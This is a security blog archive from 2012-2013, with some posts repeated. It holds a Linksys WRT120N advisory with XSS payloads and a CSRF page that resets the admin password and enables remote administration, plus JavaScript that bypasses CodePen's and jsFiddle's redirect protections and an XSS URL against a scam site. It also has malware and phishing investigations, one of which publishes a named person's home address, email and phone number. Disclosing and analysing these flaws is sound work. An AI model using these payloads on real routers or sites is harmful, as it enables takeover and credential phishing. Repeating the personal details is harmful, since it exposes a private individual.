Thursday, October 17, 2013
Sunday, September 15, 2013
Linksys WRT120N Multiple Vulnerabilities (XSS, Redirect, CSRF)
The following examples assume the device is located at 192.168.1.1. The attacks require authentication to the router or a CSRF attack against an authenticated user.
Firmware
v1.0.07 (Build 02) (Download)
Serial and PIN
The device serial number, PIN code, firmware, MAC, and other information can be found at https://192.168.1.1/Hidden_infoPage.stm
Open Redirect
Page: wait.stm
Param: redirect_url
https://192.168.1.1/wait.stm?redirect_url=http://www.google.com&delay_time=0
Reflected XSS
Page: traceroute.stm
Param: taddress
https://192.168.1.1/traceroute.stm?taddress=www.google.com'><script>alert(1);</script>
Persistent XSS
Page: Setup->Basic Setup
Param: host_name
Param: domain_name
URL - https://192.168.1.1/cgi-bin/apply.cgi
POST Data
host_name='><script>alert(1);</script>
&domain_name='><script>alert(1);</script>
&delay=0&opp=add&gateway1=&gateway2=&gateway3=&gateway4=&LangSel=0&change_lang=0&wan_type=0&curAtmIdx=3%27&dhcp_clt=1&mtu_type=0&lan_ip1=192&lan_ip2=168&lan_ip3=1&lan_ip4=1&lan_subnet_mask=0&lan_mask1=255&lan_mask2=255&lan_mask3=255&lan_mask4=0&dhcp_server=1&r_dhcp_server=1&start_ip4=100&num_addr=50&lease_m=1440&s_dns11=0&s_dns12=0&s_dns13=0&s_dns14=0&sdns1=0.0.0.0&s_dns21=0&s_dns22=0&s_dns23=0&s_dns24=0&sdns2=0.0.0.0&s_dns31=0&s_dns32=0&s_dns33=0&s_dns34=0&sdns3=0.0.0.0&wins1=0&wins2=0&wins3=0&wins4=0&time_zone=4+1&exec_cgis=SetBS&ret_url=%2Findex.stm%3Ftitle%3DSetup-Basic%2520Setup
Persistent XSS
Page: Setup->Advanced Routing
Param: router_name
URL - https://192.168.1.1/cgi-bin/apply.cgi
POST Data
router_name='><script>alert(1);</script>
&delay=0&op=add&NAT=1&nat_enable=1&RIP=0&set_num=0&sr_ip1=0&sr_ip2=0&sr_ip3=0&sr_ip4=0&sr_mask1=0&sr_mask2=0&sr_mask3=0&sr_mask4=0&sr_gw1=0&sr_gw2=0&sr_gw3=0&sr_gw4=0&routing_interface=0&exec_cgis=SetAR&ret_url=%2Findex.stm%3Ftitle%3DSetup-Advanced%2520Routing
Persistent XSS
Page: Wireless->Wireless Security
Param: sharedkey
URL - https://192.168.1.1/cgi-bin/apply.cgi
POST Data
sharedkey=</script><script>alert(1);//
&delay=0&sec_mode=psk1&enc_type=0&rds_ip1=0&rds_ip2=0&rds_ip3=0&rds_ip4=0&rds_port=1812&rds_secret=&group_key_second=3600&encryption_type=0&passPhrase=&generate=0&key1=&key2=&key3=&key4=&TX_Key=0&exec_cgis=WirWS&ret_url=%2Findex.stm%3Ftitle%3DWireless-Wireless%2520Security
Persistent XSS
Page: Applications & Gaming->Port Range Triggering
Param: name0 (All nameX fields are vulnerable)
URL - https://192.168.1.1/cgi-bin/apply.cgi
POST Data
name0="><script>alert(1);</script>
&delay=0&tport0_start=1&tport0_end=2&gport0_start=1&gport0_end=2&name1=&tport1_start=&tport1_end=&gport1_start=&gport1_end=&name2=&tport2_start=&tport2_end=&gport2_start=&gport2_end=&name3=&tport3_start=&tport3_end=&gport3_start=&gport3_end=&name4=&tport4_start=&tport4_end=&gport4_start=&gport4_end=&name5=&tport5_start=&tport5_end=&gport5_start=&gport5_end=&name6=&tport6_start=&tport6_end=&gport6_start=&gport6_end=&name7=&tport7_start=&tport7_end=&gport7_start=&gport7_end=&name8=&tport8_start=&tport8_end=&gport8_start=&gport8_end=&name9=&tport9_start=&tport9_end=&gport9_start=&gport9_end=&exec_cgis=AppPRT&ret_url=%2Findex.stm%3Ftitle%3DApplications%2520%2526%2520Gaming-Port%2520Range%2520Triggering
CSRF
Remote administration can be enabled and passwords can be changed via cross site request forgery. The following example page can be used.
OS Command Injection
Similar models (like the WRT110) suffer from blind command injection attacks in parameters on the Ping diagnostics page. While unverified, it's likely the WRT120N contains similar vulnerabilities. The router repeatedly power cycled while testing this, so your mileage may vary.
https://192.168.1.1/ping.stm?paddress=X&ping_size=X&ping_no=X&ping_int=X&ping_time=X
Timeline
Linksys support says that the 10 minute session timeout within the WRT120N will mitigate the attack, so no firmware update is to be released.
Firmware
v1.0.07 (Build 02) (Download)
Serial and PIN
The device serial number, PIN code, firmware, MAC, and other information can be found at https://192.168.1.1/Hidden_infoPage.stm
Open Redirect
Page: wait.stm
Param: redirect_url
https://192.168.1.1/wait.stm?redirect_url=http://www.google.com&delay_time=0
Reflected XSS
Page: traceroute.stm
Param: taddress
https://192.168.1.1/traceroute.stm?taddress=www.google.com'><script>alert(1);</script>
Persistent XSS
Page: Setup->Basic Setup
Param: host_name
Param: domain_name
URL - https://192.168.1.1/cgi-bin/apply.cgi
POST Data
host_name='><script>alert(1);</script>
&domain_name='><script>alert(1);</script>
&delay=0&opp=add&gateway1=&gateway2=&gateway3=&gateway4=&LangSel=0&change_lang=0&wan_type=0&curAtmIdx=3%27&dhcp_clt=1&mtu_type=0&lan_ip1=192&lan_ip2=168&lan_ip3=1&lan_ip4=1&lan_subnet_mask=0&lan_mask1=255&lan_mask2=255&lan_mask3=255&lan_mask4=0&dhcp_server=1&r_dhcp_server=1&start_ip4=100&num_addr=50&lease_m=1440&s_dns11=0&s_dns12=0&s_dns13=0&s_dns14=0&sdns1=0.0.0.0&s_dns21=0&s_dns22=0&s_dns23=0&s_dns24=0&sdns2=0.0.0.0&s_dns31=0&s_dns32=0&s_dns33=0&s_dns34=0&sdns3=0.0.0.0&wins1=0&wins2=0&wins3=0&wins4=0&time_zone=4+1&exec_cgis=SetBS&ret_url=%2Findex.stm%3Ftitle%3DSetup-Basic%2520Setup
Persistent XSS
Page: Setup->Advanced Routing
Param: router_name
URL - https://192.168.1.1/cgi-bin/apply.cgi
POST Data
router_name='><script>alert(1);</script>
&delay=0&op=add&NAT=1&nat_enable=1&RIP=0&set_num=0&sr_ip1=0&sr_ip2=0&sr_ip3=0&sr_ip4=0&sr_mask1=0&sr_mask2=0&sr_mask3=0&sr_mask4=0&sr_gw1=0&sr_gw2=0&sr_gw3=0&sr_gw4=0&routing_interface=0&exec_cgis=SetAR&ret_url=%2Findex.stm%3Ftitle%3DSetup-Advanced%2520Routing
Persistent XSS
Page: Wireless->Wireless Security
Param: sharedkey
URL - https://192.168.1.1/cgi-bin/apply.cgi
POST Data
sharedkey=</script><script>alert(1);//
&delay=0&sec_mode=psk1&enc_type=0&rds_ip1=0&rds_ip2=0&rds_ip3=0&rds_ip4=0&rds_port=1812&rds_secret=&group_key_second=3600&encryption_type=0&passPhrase=&generate=0&key1=&key2=&key3=&key4=&TX_Key=0&exec_cgis=WirWS&ret_url=%2Findex.stm%3Ftitle%3DWireless-Wireless%2520Security
Persistent XSS
Page: Applications & Gaming->Port Range Triggering
Param: name0 (All nameX fields are vulnerable)
URL - https://192.168.1.1/cgi-bin/apply.cgi
POST Data
name0="><script>alert(1);</script>
&delay=0&tport0_start=1&tport0_end=2&gport0_start=1&gport0_end=2&name1=&tport1_start=&tport1_end=&gport1_start=&gport1_end=&name2=&tport2_start=&tport2_end=&gport2_start=&gport2_end=&name3=&tport3_start=&tport3_end=&gport3_start=&gport3_end=&name4=&tport4_start=&tport4_end=&gport4_start=&gport4_end=&name5=&tport5_start=&tport5_end=&gport5_start=&gport5_end=&name6=&tport6_start=&tport6_end=&gport6_start=&gport6_end=&name7=&tport7_start=&tport7_end=&gport7_start=&gport7_end=&name8=&tport8_start=&tport8_end=&gport8_start=&gport8_end=&name9=&tport9_start=&tport9_end=&gport9_start=&gport9_end=&exec_cgis=AppPRT&ret_url=%2Findex.stm%3Ftitle%3DApplications%2520%2526%2520Gaming-Port%2520Range%2520Triggering
CSRF
Remote administration can be enabled and passwords can be changed via cross site request forgery. The following example page can be used.
<html>
<head><title>CSRF Test</title></head>
<body>
<form id="csrf" method="post"
action="https://192.168.1.1/cgi-bin/apply.cgi">
<!-- Change admin password to NewPassword --!>
<input type="hidden" name="change_pass" value="1" />
<input type="hidden" name="password" value="NewPassword" />
<input type="hidden" name="c_password" value="NewPassword" />
<input type="hidden" name="defPassword" value="admin" />
<!-- Enable remote administration via https port 6666 --!>
<input type="hidden" name="r_web_https" value="1" />
<input type="hidden" name="r_web_wleb" value="1" />
<input type="hidden" name="remote_adm" value="1" />
<input type="hidden" name="r_remote_adm" value="1" />
<input type="hidden" name="r_remote_proto" value="1" />
<input type="hidden" name="admin_port" value="6666" />
<!-- Other values expected by the script --!>
<input type="hidden" name="delay" value="0" />
<input type="hidden" name="beginip" value="0.0.0.0" />
<input type="hidden" name="endip" value="0.0.0.0" />
<input type="hidden" name="upnp" value="1" />
<input type="hidden" name="r_upnp" value="1" />
<input type="hidden" name="r_upnp_uset" value="1" />
<input type="hidden" name="r_upnp_dinetacc" value="0" />
<input type="hidden" name="wlan" value="1" />
<input type="hidden" name="reboot" value="0" />
<input type="hidden" name="exec_cgis" value="AdmM" />
<input type="hidden" name="ret_url"
value="%2Findex.stm%3Ftitle%3DAdministration-Management" />
</form>
<script>document.getElementById("csrf").submit()</script>
</body>
</html>
OS Command Injection
Similar models (like the WRT110) suffer from blind command injection attacks in parameters on the Ping diagnostics page. While unverified, it's likely the WRT120N contains similar vulnerabilities. The router repeatedly power cycled while testing this, so your mileage may vary.
https://192.168.1.1/ping.stm?paddress=X&ping_size=X&ping_no=X&ping_int=X&ping_time=X
Timeline
- 11 Apr 2013 - initial contact with support
- 12 Apr 2013 - ticket opened
- 17 Jul 2013 - asked for update
- 18 Jul 2013 - update, ticket still open
- 04 Sep 2013 - ticket closed
Linksys support says that the 10 minute session timeout within the WRT120N will mitigate the attack, so no firmware update is to be released.
Saturday, September 7, 2013
Cryptanalysis of David Spade
A recent cryptographic analysis of David Spade's numerology revealed a celebrity 0day: mathematical proof that David Spade is To Mega Therion, the Great Beast of Revelation.
DAVID = 4 1 22 9 4
SPADE = 19 16 1 4 5
4 + 1 + 22 + 9 + 4 = 40
19 + 16 + 1 + 4 + 5 = 45
2 names of 5 letters
10 letters total in name
40 / 10 = 4
45 / 10 = 4.5
4 * 4.5 = 18
18 = 6 * 3 = 6 + 6 + 6
SIX THREE TIMES! 666!
I haven't figured out how PGP figures into this yet, but I'm working on it.
DAVID = 4 1 22 9 4
SPADE = 19 16 1 4 5
4 + 1 + 22 + 9 + 4 = 40
19 + 16 + 1 + 4 + 5 = 45
2 names of 5 letters
10 letters total in name
40 / 10 = 4
45 / 10 = 4.5
4 * 4.5 = 18
18 = 6 * 3 = 6 + 6 + 6
SIX THREE TIMES! 666!
I haven't figured out how PGP figures into this yet, but I'm working on it.
Monday, March 4, 2013
Phisherman's Tales, Vol II
Being a fan of The Pirate Bay means enabling adblocks or endless battles with popups. update85.com is a frequent pop-under advertisement served on The Pirate Bay. It prompts the user to install a "pro" version of Flash that will make your whole life awesome. Also, considering there is no real pro version of flash, it will give your computer malware.
Update: the domain has since switched to update95.com.
Site Analysis
update85.com was purchased from Namecheap with WhoisGuard protection. Its server runs nginx and is currently located at 75.101.138.50 in the Amazon cloud. AWS and WhoisGuard is a pattern that's repeated with the other names and IPs as well. Take note, devs, even the bad guys are moving to the cloud.
The original pop-under URL:
The "af" parameter is an identifying hash that's later used as a unique name for the executable payload.
Somewhat ironically, the "al" parameter containing the warning message is vulnerable to XSS.
Analyzing the source for the landing page gives us some inline JS, links to various pages (such as software licensing terms), and the link to the dropper program. The source for these files can be downloaded here (scroll down, click grey 'download' button, and wait for the timer to finish).
The inline javascript injects two remote scripts:
1) New Relic analytics code, including rum.js used for page timing measurements. Their New Relic api-key is e981baeb5e and their appID is 2056962.
2) 46.51.162.142/giq.js, which passes tracking information to a remote PHP logger located at pixeltrk.info/log.php with the following GET parameters:
Uninstall, Contact, and Terms
The uninstall page simply tells you to remove Flash Player Pro from your Add & Remove Programs option in the control panel. It then gives the following disclaimer:
Finally, the contact information lists:
File Analysis
If you click through the BS, you're eventually rewarded with a download of Flash Player Pro, served on nicdls.com. It is located at 176.31.90.48 in Spain, runs nginx and PHP/5.4.7-1~dotdeb.0, and was registered using Whois Privacy Service from DonDominio.com.
You can download your own copy from the live site here or download my copy of the executable from here (click grey 'download' button and wait for the timer to finish).
The executable that gets sent is a windows exe dropper. The name of the file depends upon your unique hash from the af parameter mentioned earlier, and follows the format V.unique_hash.
Update: the domain has since switched to update95.com.
Site Analysis
update85.com was purchased from Namecheap with WhoisGuard protection. Its server runs nginx and is currently located at 75.101.138.50 in the Amazon cloud. AWS and WhoisGuard is a pattern that's repeated with the other names and IPs as well. Take note, devs, even the bad guys are moving to the cloud.
The original pop-under URL:
http://update85.com/flashplayer/pro4/indexd1.php?&_mcnc&af=04f021240deadbeef5cf746771e3d54d&of=gTPB-5-usa%20%20&p=y&al=WARNING!%20Your%20Flash%20Player%20may%20be%20out%20of%20date.%20Please%20update%20to%20continueThe URL contains parameters for analytics and tailoring the warning message that the page displays.
The "af" parameter is an identifying hash that's later used as a unique name for the executable payload.
Somewhat ironically, the "al" parameter containing the warning message is vulnerable to XSS.
update85.com/flashplayer/pro4/indexd1.php?al=WARNING!'); alert('xssIt's possible some of the other parameters, such as those logged for analytics, may be vulnerable to persistent XSS or SQLi as well.
Analyzing the source for the landing page gives us some inline JS, links to various pages (such as software licensing terms), and the link to the dropper program. The source for these files can be downloaded here (scroll down, click grey 'download' button, and wait for the timer to finish).
The inline javascript injects two remote scripts:
1) New Relic analytics code, including rum.js used for page timing measurements. Their New Relic api-key is e981baeb5e and their appID is 2056962.
2) 46.51.162.142/giq.js, which passes tracking information to a remote PHP logger located at pixeltrk.info/log.php with the following GET parameters:
'd' = document.location.hostnameIt also contains the following comment:
'r' = escape(document.referrer)
'l' = escape(window.navigator.language)
'u' = escape(window.navigator.userAgent)
'loc' = escape(document.location.href)
//beta versionb - live to be hosted on: d1cebafy1ctaaq.cloudfront.net/1pixeltrk.info resolves to 46.51.162.142 and is also an nginx, WhoisGuard'd AWS instance (located in the Ireland cloud).
Uninstall, Contact, and Terms
The uninstall page simply tells you to remove Flash Player Pro from your Add & Remove Programs option in the control panel. It then gives the following disclaimer:
Upon uninstall of the software certain data such as folders, files, registry keys, and cookies, may remain on your machine.The licensing terms page is an agreement between you and "Download4Free.org." It's the general cover-my-ass legal license.
Finally, the contact information lists:
info@download4free.org
1601 Main St. Suite 90-151
Willimantic, CT
06226The pages also say they were built using WYSIWYG Builder 8, so I lol'd. Download4Free.org is located at 184.168.221.42, registered with GoDaddy's Domains By Proxy, and is hosted at GoDaddy as well. It's an IIS 7.5 server running ASP.net 4.0.30319. It's had some other SEO domains hosted on it as well.
File Analysis
If you click through the BS, you're eventually rewarded with a download of Flash Player Pro, served on nicdls.com. It is located at 176.31.90.48 in Spain, runs nginx and PHP/5.4.7-1~dotdeb.0, and was registered using Whois Privacy Service from DonDominio.com.
You can download your own copy from the live site here or download my copy of the executable from here (click grey 'download' button and wait for the timer to finish).
The executable that gets sent is a windows exe dropper. The name of the file depends upon your unique hash from the af parameter mentioned earlier, and follows the format V.unique_hash.
ham@meat:~/code$ file spam/V.04f021240deadbeef5cf746771e3d54dI haven't busted out IDA or anything yet, but a quick look at the file's strings shows calls to registry edits and drops to a temp folder. Running it through Virustotal showed a detection ratio of 11/46, meaning 11 antivirus products found it to be malicious. Most AVs detected it as W32/DomaIQ.A. You can view its results for yourself here.
spam/V.04f021240deadbeef5cf746771e3d54d: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Tuesday, February 19, 2013
Phisherman's Tales, Vol I
On February 12th, an awesomely bad phishing email slammed head-long into my inbox. It was targeted at students and employees of my former university, so I decided to poke at it for giggles. The message and its headers:
Let's dig into some of the IPs from the headers. All of this information is freely available through domain and network registrations.
Next lets wget the contents of the page and see what was shakin' over there.
Let's checkout formmailhosting.com:
The address seems to jive with the registration information, but who's email was that? A quick google of "bfleming98@gmail.com" shows Bryan C. Fleming, owner of a slew of domain names. Fair enough.
But what about our mysterious Stanley Ling? Stan registered his domain to stanley.ling@gmail.com, located at 29 Jalan 18/26, Taman Sri Rampai, Setapak in Kuala Lumpur, Malaysia. Here's a map.
Searching the registration email that was used, "stanley.ling@gmail.com," gives us his profile at a marketing website, where he confirms the email address and uses the username "syling."
It's worth noting that periods are ommitable in gmail addresses, so we can also search for stanleyling@gmail.com. This gives us multiple SEO marketing sites. His cks-online.com domain now bounces to a suspended page for an affiliate marketing program.
A search for "stanley ling malaysia" brings us multiple hits for an actual Stanley Ling living in Setapak and using the name syling. He has multiple profiles confirming his address and interests in online marketing.
So, there you have it. Was Stan owned by a fellow affiliate marketer or was he the originator? Who knows, but I had fun anyway.
Return-path: <msu@mus.edu>Seems legit that the MSU helpdesk staff would send an email from "mus.edu" asking everyone to log into cks-online.com.
Envelope-to: XXXXXXXX@msu.edu
Delivery-date: Tue, 12 Feb 2013 10:33:42 -0500
Received: from [202.123.76.219] (helo=bsdmail2.tgtnet.com)
by ZZZZ.ZZZZ.msu.edu with esmtp (Exim 4.75 #3)
id 1U5HrM-0006V8-HV; Tue, 12 Feb 2013 10:33:30 -0500
Received: from tgtnet.com (localhost.localdomain [127.0.0.1])
by bsdmail2.tgtnet.com (8.14.2/8.14.2) with ESMTP id r1CF4Xrm096120;
Tue, 12 Feb 2013 23:04:33 +0800 (HKT)
(envelope-from msu@mus.edu)
From: "Michigan State University" <msu@mus.edu>
Subject: Warning!!!
Date: Tue, 12 Feb 2013 23:04:32 +0800
Message-Id: <20130212145850.M25036@mus.edu>
X-Mailer: OpenWebMail 2.52 20060502
X-OriginatingIP: 180.74.192.93 (terry.yue)
MIME-Version: 1.0
Content-Type: text/plain;
charset=iso-8859-1
To: undisclosed-recipients:;
Content-Transfer-Encoding: quoted-printable
X-MIME-Autoconverted: from 8bit to quoted-printable by bsdmail2.tgtnet.com id r1CF4Xrm096120
[Snip]
Subject: *****SPAM***** Warning!!!
Body:
Dear Subscriber's,
We have detected some unusual message from your account,to avoid you loosing
your account or suspension,you will have to re-confirm your account for us to
know that you are the right full owner of this email account.
You are therefore required to click or copy the link
http://cks-online.com/wp-mail.htm
to enable us verify and perform maintenance in your email account with our
new system upgrading software.Failure to provide your valid information, your
account will be suspended temporarily from our services.
We sincerely apologize for the inconvenience this might have caused you.
Helpdesk Team,
© 2013 Michigan State University
All rights reserved.
Michigan State University. Est. 1855. East Lansing, Michigan USA.
Let's dig into some of the IPs from the headers. All of this information is freely available through domain and network registrations.
202.123.76.219Huh. Mr. Seng Hoon Lee is gettin' busy. So, how about the phishing site, cks-online.com?
inetnum: 202.123.64.0 - 202.123.95.255
netname: HENDERSON
descr: Henderson Data Centre Limited
descr: 6/F, World-Wide House,Central
country: HK
person: Tech Admin
address: Henderson Data Centre Limited
address: 17/F WELL TECH CENTRE
address: 9 Pat Tat Street
address: San Po Kong
address: Kowloon
address: Hong Kong
country: HK
phone: +852-2908-6900
fax-no: +852-2908-6966
e-mail: tech.admin@ihenderson.com
180.74.192.93
inetnum: 180.72.0.0 - 180.75.255.255
netname: P1NETWORKS-MY
descr: Packet One Networks (M) S
dn
descr: Internet Service Provider
descr: Kuala Lumpur, Malaysia
country: MY
person: Seng Hoon Lee
nic-hdl: SL2018-AP
e-mail: senghoon.lee@packet-1.com
address: Level 4, PacketHub,
address: 59 Jalan Templer,
address: 46050 Petaling Jaya, Selangor,
address: Malaysia.
phone: +603-74508888
fax-no: +603-74508891
Queried whois.godaddy.com with "cks-online.com"...Oh Stanley Ling, you card! You can see the ~136 other phishing and SEO sites hosted on the same IP here.
Registered through: GoDaddy.com, LLC (http://www.godaddy.com)
Domain Name: CKS-ONLINE.COM
Created on: 28-Feb-09
Expires on: 28-Feb-13
Last Updated on: 25-Feb-12
Registrant:
Stanley Ling
29, Jalan 1826,
Taman Sri Rampai, Setapak,
Kuala Lumpur, WP 53300
Malaysia
Administrative Contact:
Ling, Stanley stanley.ling@gmail.com
29, Jalan 1826,
Taman Sri Rampai, Setapak,
Kuala Lumpur, WP 53300
Malaysia
+60.60126480288
Queried whois.arin.net with "n 97.79.238.221"...
NetRange: 97.76.0.0 - 97.79.255.255
CIDR: 97.76.0.0/14
OriginAS:
NetName: RCSW
NetHandle: NET-97-76-0-0-1
Parent: NET-97-0-0-0-0
NetType: Direct Allocation
RegDate: 2007-09-11
Updated: 2012-02-24
Ref: http://whois.arin.net/rest/net/NET-97-76-0-0-1
OrgName: Road Runner HoldCo LLC
OrgId: RCSW
Address: 13820 Sunrise Valley Drive
City: Herndon
StateProv: VA
PostalCode: 20171
Country: US
RegDate: 2001-09-07
Updated: 2011-07-06
Next lets wget the contents of the page and see what was shakin' over there.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN"Lame. Boxhost.me is a free web hosting service, and now we have a username: sycure. A search for it brings up an infosec blog: sycure.wordpress.com. In the interests of science, I used wget to mirror everything on sycure.boxhost.me, which you can download here. Stan made 3-4 versions of the same phishing site, apparently. There's not much worthwhile here, just shitty code. The robots.txt implies a wordpress install, but I didn't see one:
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><title>
Account Verification Page
</title></head>
<frameset rows="100%">
<frame src="http://sycure.boxhost.me/efe/Login.htm" />
<noframes>
<body>Please follow the <a href="http://sycure.boxhost.me/efe/Login.htm">link</a>.</body>
</noframes>
</frameset>
</html>
User-agent: *The phishing page forwards your credentials to a php script, presumably to send them off, and then bounces you to a thankyou.html page. The interesting part here was the analytics code at the bottom of the Thank You page:
Disallow: /wp-admin/
Disallow: /wp-includes/
<script type="text/javascript">Their analytics tracking number is listed near the end: UA-491816-39. Googling it brings us scrapes of a bunch of pages, the topmost of which is Formmailhosting.com, Youtubedriver.com, and Ricksgamblingguide.com. Formmailhosting is an affiliate marketing program (shocking), with a youtube page about affiliate marketing (also shocking).
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-491816-39");
pageTracker._trackPageview();
} catch(err) {}</script>
Let's checkout formmailhosting.com:
Registered through: GoDaddy.com, LLC (http://www.godaddy.com)Sherry's email seems a little odd: bfleming. A search for "sherry fleming michigan" brings us to the flash site of a web designer who apparently has worked on a Poker site. The address listed on the page is the same as the domain listed above.
Domain Name: FORMMAILHOSTING.COM
Created on: 17-Dec-08
Expires on: 17-Dec-13
Last Updated on: 18-Dec-12
Registrant:
Fleming Technologies
7156 Georgetown
Washington, Michigan 48095
United States
Administrative Contact:
Fleming, Sherry bfleming98@gmail.com
Fleming Technologies
7156 Georgetown
Washington, Michigan 48095
United States
(248) 974-6876
The address seems to jive with the registration information, but who's email was that? A quick google of "bfleming98@gmail.com" shows Bryan C. Fleming, owner of a slew of domain names. Fair enough.
But what about our mysterious Stanley Ling? Stan registered his domain to stanley.ling@gmail.com, located at 29 Jalan 18/26, Taman Sri Rampai, Setapak in Kuala Lumpur, Malaysia. Here's a map.
Searching the registration email that was used, "stanley.ling@gmail.com," gives us his profile at a marketing website, where he confirms the email address and uses the username "syling."
It's worth noting that periods are ommitable in gmail addresses, so we can also search for stanleyling@gmail.com. This gives us multiple SEO marketing sites. His cks-online.com domain now bounces to a suspended page for an affiliate marketing program.
A search for "stanley ling malaysia" brings us multiple hits for an actual Stanley Ling living in Setapak and using the name syling. He has multiple profiles confirming his address and interests in online marketing.
So, there you have it. Was Stan owned by a fellow affiliate marketer or was he the originator? Who knows, but I had fun anyway.
Sunday, December 30, 2012
Weaponizing Pt 3: CodePen Redux
Note: CodePen has been notified of these problems and has fixed them. This is an analysis of how their original fix was bypassed and these techniques could possibly be applied to future redirection vulnerabilities.
Since my post about using code playgrounds as attack platforms, CodePen has added some JavaScript that will alert a user if the pen is trying to redirect them to a 3rd party domain. If you use the example redirect code from earlier in this series, you'll be presented with a prompt asking you if you'd like to leave CodePen. This article explains how to work around this code and carry out a redirection.
At the time of this writing, you can use Chrome developer tools or FireBug to see this code in action:
Bypassing the Prompt
There are a couple of ways we can disable this prompting function. The first, blunt approach, is simply overwriting the window.onbeforeunload hook. We'll replace their function with a blank one of our own, then carry out our redirect.
This one is pretty easy. They're looking for form actions in our HTML, so we can overcome their form action filtering by dynamically assigning our form's action in JavaScript. Chaining our two techniques together gives us the following working redirect code:
So, besides open redirects, what else can we do with all of this? Well, CodePen has started rolling out professional accounts, and you no longer need Github to make one. Why not use their site to make a pen and go phishing?
Using data URIs combined with redirects, it would be easy to clone their login page in a pen. Add a message saying, "This pen is protected. Please log in to continue." We can now redirect any entered credentials to our own 3rd party site, log them for future use, then bounce the user to a real pen.
Summary
Although the examples in this series were trivial, they could easily be leveraged as a malicious attack platform. As CodePen begins to roll out more of their own features, especially those that people pay for, these techniques will become more exploitable.
Return to Part 1: Overview or Part 2: jsFiddle.
Since my post about using code playgrounds as attack platforms, CodePen has added some JavaScript that will alert a user if the pen is trying to redirect them to a 3rd party domain. If you use the example redirect code from earlier in this series, you'll be presented with a prompt asking you if you'd like to leave CodePen. This article explains how to work around this code and carry out a redirection.
At the time of this writing, you can use Chrome developer tools or FireBug to see this code in action:
window.__canLeave = false;In this code, they are hooking the onbeforeunload window event, which will execute their function when the browser window attempts to "unload" (read: navigate away from) the current page. If you tried our form-based redirect, you may have noticed that they will also attempt to overwrite form actions pointing to other domains.
window.onbeforeunload = function() {
if (!__canLeave) {
return "WARNING! You are leaving the safety of CodePen! Are you sure you want to leave?";
}
};
setTimeout(function() {
window.__canLeave = true;
}, 200);
Bypassing the Prompt
There are a couple of ways we can disable this prompting function. The first, blunt approach, is simply overwriting the window.onbeforeunload hook. We'll replace their function with a blank one of our own, then carry out our redirect.
<script>A slightly more elegant approach is to not modify their function logic, but simply meet the function's requirements for a redirect. Because their __canLeave variable is attached to the window object, we can access it from our closure. So, let's just overwrite it:
window.onbeforeunload = function() {null;}
var target = 'win dow.loca tion="htt p://www.goo gle.com";';
eval(target.replace(/ /gi, ''));
</script>
<script>Bypassing the Action Rewrite
window.__canLeave = true;
var target = 'win dow.loca tion="htt p://www.goo gle.com";';
eval(target.replace(/ /gi, ''));
</script>
This one is pretty easy. They're looking for form actions in our HTML, so we can overcome their form action filtering by dynamically assigning our form's action in JavaScript. Chaining our two techniques together gives us the following working redirect code:
<form id="bbb" />So Long And Thanks For All The Phish
<script>
window.__canLeave = true;
document.getElementById("bbb").action = "http://www.google.com";
document.getElementById("bbb").submit();
</script>
So, besides open redirects, what else can we do with all of this? Well, CodePen has started rolling out professional accounts, and you no longer need Github to make one. Why not use their site to make a pen and go phishing?
Using data URIs combined with redirects, it would be easy to clone their login page in a pen. Add a message saying, "This pen is protected. Please log in to continue." We can now redirect any entered credentials to our own 3rd party site, log them for future use, then bounce the user to a real pen.
Summary
Although the examples in this series were trivial, they could easily be leveraged as a malicious attack platform. As CodePen begins to roll out more of their own features, especially those that people pay for, these techniques will become more exploitable.
Return to Part 1: Overview or Part 2: jsFiddle.
Thursday, December 13, 2012
Weaponizing Pt 2: Framebusting jsFiddle
In part 1 of this series, we looked at how we could use code playgrounds as open redirect services. One of our targets was jsFiddle. jsFiddle
attempted to avoid some of our redirection problems by sandboxing a
user's code in an iframe. On the surface, this seemed to solve the problem: by constantly leaving a JSFiddle banner on the page, the user is always
reminded that they're viewing a fiddle.
At this point, the attacker needs to escape their horrible sandbox prison. Incidentally, this has been done before: framebusting to the rescue. Framebusting is traditionally a technique used to prevent UI redressing, essentially allowing a victim page to bust out of a potentially malicious iframe. We can use this technique to defeat jsFiddle's sandboxing iframe.
Again, we'll add our redirection code to the HTML area of our fiddle:
Summary
This again reiterates how difficult it is to control client-side functionality in a language as robust as JavaScript. When JavaScript controls the DOM, and the DOM can have embedded JavaScript, it only takes one oversight to take full control of content.
At this point, the attacker needs to escape their horrible sandbox prison. Incidentally, this has been done before: framebusting to the rescue. Framebusting is traditionally a technique used to prevent UI redressing, essentially allowing a victim page to bust out of a potentially malicious iframe. We can use this technique to defeat jsFiddle's sandboxing iframe.
Again, we'll add our redirection code to the HTML area of our fiddle:
<form id="fun" action="http://www.gawker.com" />If you run this fiddle now, you'll see the Gawker homepage, along with a jsFiddle banner along the top of the page. Now we can use JavaScript to escape the shackles of our imprisonment, improving our redirect. By changing our code to the following, we can bust out of our iframe and redirect properly:
<script>document.getElementById("fun").submit();</script>
<script>if( self != top ) {top.location = self.location;}</script>This extra line checks if our current script's location is the same as our parent window's location. Because our script is running in a frame, our location (in the frame) is different than the parent's location (out of the frame). Whenever this happens, we set the parent's location to our current location. Our script then continues to our redirect as normal.
<form id="fun" action="http://www.gawker.com" />
<script>document.getElementById("fun").submit();</script>
Summary
This again reiterates how difficult it is to control client-side functionality in a language as robust as JavaScript. When JavaScript controls the DOM, and the DOM can have embedded JavaScript, it only takes one oversight to take full control of content.
Subscribe to:
Posts (Atom)